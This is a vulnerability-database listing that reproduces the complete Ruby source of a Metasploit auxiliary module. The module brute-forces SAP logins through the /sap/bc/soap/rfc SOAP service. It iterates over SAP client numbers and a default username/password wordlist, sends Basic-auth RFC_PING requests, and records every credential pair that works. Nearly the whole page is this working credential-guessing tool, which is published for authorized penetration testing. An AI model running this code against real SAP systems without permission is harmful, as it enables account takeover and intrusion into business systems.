Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
packetstormNmonkee, Agnivesh Sathasivam, metasploit.comPACKETSTORM:180994
HistorySep 01, 2024 - 12:00 a.m.

SAP SOAP Service RFC_PING Login Brute Forcer

2024-09-0100:00:00
nmonkee, Agnivesh Sathasivam, metasploit.com
packetstormsecurity.com
12
sap
bruteforce
soap service
rfc_ping
username
password

AI Score

7.4

Confidence

Low

JSON
`##  
# This module requires Metasploit: https://metasploit.com/download  
# Current source: https://github.com/rapid7/metasploit-framework  
##  
  
##  
# This module is based on, inspired by, or is a port of a plugin available in  
# the Onapsis Bizploit Opensource ERP Penetration Testing framework -  
# http://www.onapsis.com/research-free-solutions.php.  
# Mariano Nunez (the author of the Bizploit framework) helped me in my efforts  
# in producing the Metasploit modules and was happy to share his knowledge and  
# experience - a very cool guy. I'd also like to thank Chris John Riley,  
# Ian de Villiers and Joris van de Vis who have Beta tested the modules and  
# provided excellent feedback. Some people just seem to enjoy hacking SAP :)  
##  
  
class MetasploitModule < Msf::Auxiliary  
include Msf::Exploit::Remote::HttpClient  
include Msf::Auxiliary::Report  
include Msf::Auxiliary::Scanner  
include Msf::Auxiliary::AuthBrute  
  
def initialize  
super(  
'Name' => 'SAP SOAP Service RFC_PING Login Brute Forcer',  
'Description' => %q{  
This module attempts to brute force SAP username and passwords through the  
/sap/bc/soap/rfc SOAP service, using RFC_PING function.  
},  
'References' =>  
[  
[ 'URL', 'https://labs.f-secure.com/tools/sap-metasploit-modules/' ]  
],  
'Author' =>  
[  
'Agnivesh Sathasivam',  
'nmonkee'  
],  
'License' => MSF_LICENSE  
)  
register_options(  
[  
Opt::RPORT(8000),  
OptString.new('CLIENT', [true, 'Client can be single (066), comma separated list (000,001,066) or range (000-999)', '000,001,066']),  
OptString.new('TARGETURI', [true, 'The base path to the SOAP RFC Service', '/sap/bc/soap/rfc']),  
OptPath.new('USERPASS_FILE', [ false, "File containing users and passwords separated by space, one pair per line",  
File.join(Msf::Config.data_directory, "wordlists", "sap_default.txt") ])  
])  
  
deregister_options('HttpUsername', 'HttpPassword')  
end  
  
def run_host(rhost)  
client_list = []  
if datastore['CLIENT'] =~ /^\d{3},/  
client_list = datastore['CLIENT'].split(/,/)  
print_status("Brute forcing clients #{datastore['CLIENT']}")  
elsif datastore['CLIENT'] =~ /^\d{3}-\d{3}\z/  
array = datastore['CLIENT'].split(/-/)  
client_list = (array.at(0)..array.at(1)).to_a  
print_status("Brute forcing clients #{datastore['CLIENT']}")  
elsif datastore['CLIENT'] =~ /^\d{3}\z/  
client_list.push(datastore['CLIENT'])  
print_status("Brute forcing client #{datastore['CLIENT']}")  
else  
fail_with(Failure::BadConfig, "Invalid CLIENT")  
end  
  
saptbl = Msf::Ui::Console::Table.new(  
Msf::Ui::Console::Table::Style::Default,  
'Header' => "[SAP] #{peer} Credentials",  
'Prefix' => "\n",  
'Postfix' => "\n",  
'Indent' => 1,  
'Columns' =>  
[  
"host",  
"port",  
"client",  
"user",  
"pass"  
])  
  
client_list.each do |c|  
print_status("#{peer} [SAP] Trying client: #{c}")  
each_user_pass do |u, p|  
vprint_status("#{peer} [SAP] Trying #{c}:#{u}:#{p}")  
begin  
success = bruteforce(u, p, c)  
saptbl << [ rhost, rport, c, u, p] if success  
rescue ::Rex::ConnectionError  
print_error("#{peer} [SAP] Not responding")  
return  
end  
end  
end  
  
if saptbl.rows.count > 0  
print_line saptbl.to_s  
end  
end  
  
def report_cred(opts)  
service_data = {  
address: opts[:ip],  
port: opts[:port],  
service_name: opts[:service_name],  
protocol: 'tcp',  
workspace_id: myworkspace_id  
}  
  
credential_data = {  
origin_type: :service,  
module_fullname: fullname,  
username: opts[:user],  
private_data: opts[:password],  
private_type: :password  
}.merge(service_data)  
  
login_data = {  
last_attempted_at: Time.now,  
core: create_credential(credential_data),  
status: Metasploit::Model::Login::Status::SUCCESSFUL,  
proof: opts[:proof]  
}.merge(service_data)  
  
create_credential_login(login_data)  
end  
  
def bruteforce(username,password,client)  
uri = normalize_uri(target_uri.path)  
  
data = '<?xml version="1.0" encoding="utf-8" ?>'  
data << '<env:Envelope xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:env="http://schemas.xmlsoap.org/soap/envelope/" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance">'  
data << '<env:Body>'  
data << '<n1:RFC_PING xmlns:n1="urn:sap-com:document:sap:rfc:functions" env:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">'  
data << '</n1:RFC_PING>'  
data << '</env:Body>'  
data << '</env:Envelope>'  
  
res = send_request_cgi({  
'uri' => uri,  
'method' => 'POST',  
'vars_get' => {  
'sap-client' => client,  
'sap-language' => 'EN'  
},  
'data' => data,  
'cookie' => "sap-usercontext=sap-language=EN&sap-client=#{client}",  
'ctype' => 'text/xml; charset=UTF-8',  
'authorization' => basic_auth(username, password),  
'encode_params' => false,  
'headers' =>  
{  
'SOAPAction' => 'urn:sap-com:document:sap:rfc:functions',  
}  
})  
  
if res && res.code == 200 && res.body.include?('RFC_PING')  
print_good("#{peer} [SAP] Client #{client}, valid credentials #{username}:#{password}")  
report_cred(  
ip: rhost,  
port: rport,  
service_name: 'sap',  
user: username,  
password: password,  
proof: "SAP Client: #{client}"  
)  
return true  
end  
  
false  
end  
end  
  
`

AI Score

7.4

Confidence

Low

JSON